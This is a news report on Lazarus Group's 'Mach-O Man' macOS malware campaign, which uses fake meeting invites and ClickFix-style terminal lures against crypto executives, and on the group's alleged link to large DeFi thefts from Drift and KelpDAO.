North Korea’s Lazarus Group is using “Mach-O Man” macOS malware and fake meeting invites to hijack crypto execs and fund nine-figure DeFi raids.
Summary
- CertiK flags “Mach-O Man,” a Lazarus-built macOS toolkit hitting crypto and fintech executives.
- Campaign uses ClickFix-style fake meeting invites to trick victims into pasting terminal commands.
- Researchers link Lazarus to over $500 million stolen from Drift and KelpDAO in recent DeFi raids.
Lazarus, the North Korean state-backed hacking outfit, has rolled out a new macOS malware campaign aimed squarely at executives in fintech and crypto, according to blockchain security firm CertiK.
The operation, dubbed “Mach-O Man,” chains social engineering and terminal-level payloads to steal crypto and sensitive corporate data while leaving almost no trace on disk.
CertiK researchers say the campaign leans on the ClickFix technique, where victims are lured into pasting what look like “repair” or “verification” commands directly into macOS Terminal during fake support or meeting flows. In this case, the lures arrive as bogus online meeting invitations that “trick victims into pasting malicious repair commands into Mac terminals,” with the toolkit auto-deleting after use to frustrate forensics, CertiK’s analysis noted.
According to threat intelligence firm SOC Prime, the “Mach-O Man” framework is tied to Lazarus’ Famous Chollima unit and distributed through compromised Telegram accounts and fake meeting invites targeting high-value crypto and financial organizations. The toolkit, according to CoinDesk, includes multiple Mach-O binaries designed to profile the host, establish persistence, and exfiltrate credentials and browser data via Telegram-based command-and-control.
Google Cloud’s Mandiant previously described similar macOS campaigns mixing ClickFix with AI-assisted video deepfakes, fake Zoom calls, and hijacked messaging accounts to push targets into executing obfuscated commands.
“The campaign used a compromised Telegram account, a fake Zoom meeting, and AI-assisted deception to trick victims into executing terminal commands leading to a macOS infection chain,” Mandiant researchers wrote.
CertiK researcher Natalie Newson linked the latest “Mach-O Man” wave to a broader Lazarus push that has siphoned more than $500 million from DeFi platforms Drift and KelpDAO in just over two weeks.
In those incidents, Lazarus allegedly combined social engineering against a trading firm with a sophisticated cross-chain exploit that allowed attackers to mint roughly 116,500 rsETH and drain about $292 million in value.
LayerZero, which provides the bridge infrastructure used by KelpDAO, said North Korea’s Lazarus Group is the “likely actor” behind the rsETH exploit and blamed a single-point-of-failure verifier design for enabling the forged cross-chain message.
“Lazarus has been targeting the cryptocurrency ecosystem for years, stealing roughly $2 billion in virtual assets in 2023 and 2024,” security outlet SecurityWeek reported, citing prior ClickFix-enabled campaigns.
With DeFi already suffering what research outlets have called its worst month on record for hacks, markets are now effectively pricing in another $100 million-plus exploit this year, underscoring how state-linked attackers like Lazarus have become systemic to crypto risk.
